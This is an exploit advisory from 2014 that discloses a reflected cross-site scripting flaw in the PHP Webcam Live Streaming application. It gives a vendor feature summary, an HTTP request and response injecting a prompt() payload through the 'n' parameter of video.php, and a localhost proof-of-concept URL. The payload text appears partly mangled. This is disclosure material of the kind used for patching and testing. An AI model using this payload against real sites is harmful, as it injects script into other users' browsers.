[+] Author: TUNISIAN CYBER [+] Exploit Title: PHP Webcam Live Streaming XSS Vulnerability [+] Date: 07-02-2014 [+] Category: WebApp [+] Google Dork: : [+] Tested on: KaliLinux [+] Vendor: http://sourceforge.net/projects/phplivestream/ [+] Friendly Sites: na3il.com,th3-creative.com ############################################################### +Description: VideoWhisper Live Streaming provides web based live video streaming (from webcam or similar sources). Live Streaming key features: + 1 to many 1 way video streaming + Live chat for viewers + User list with online participants + Channel title + HTML embed code to publish video channel + P2P group streaming support + Session timer and control with scripts + 100% web based for clients The php edition is the easiest choice to setup and run the Live Streaming application on a website. Also to integrate with any php script or content management system that does not have a ready made integration, yet. PHP Live Streaming Edition Highlights: + Create Live Video Channels + Broadcast Live Video from Browser + Share Channels Link/Embed Code + Limit Total Use Time by Channel + Simple Setup + Easy to Install + Full PHP Source Code + Easy to Integrate +Exploit: PHP Webcam Live Streaming suffers from an XSS vulnerability +HTTP Header: Request: GET /ls_php/video.php?n=Studio195prompt(956046) HTTP/1.1 Referer: http://127.0.0.1:80/ls_php/ Host: 127.0.0.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Response: HTTP/1.1 200 OK Date: Fri, 07 Feb 2014 20:48:26 GMT Server: Apache/2.2.8 (Win32) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Length: 900 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 +PoC:(Localtest) 127.O.O.1 /ls_php/video.php?n=Studio195prompt(956046) http://oi62.tinypic.com/f3tc89.jpg ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ########################################################################################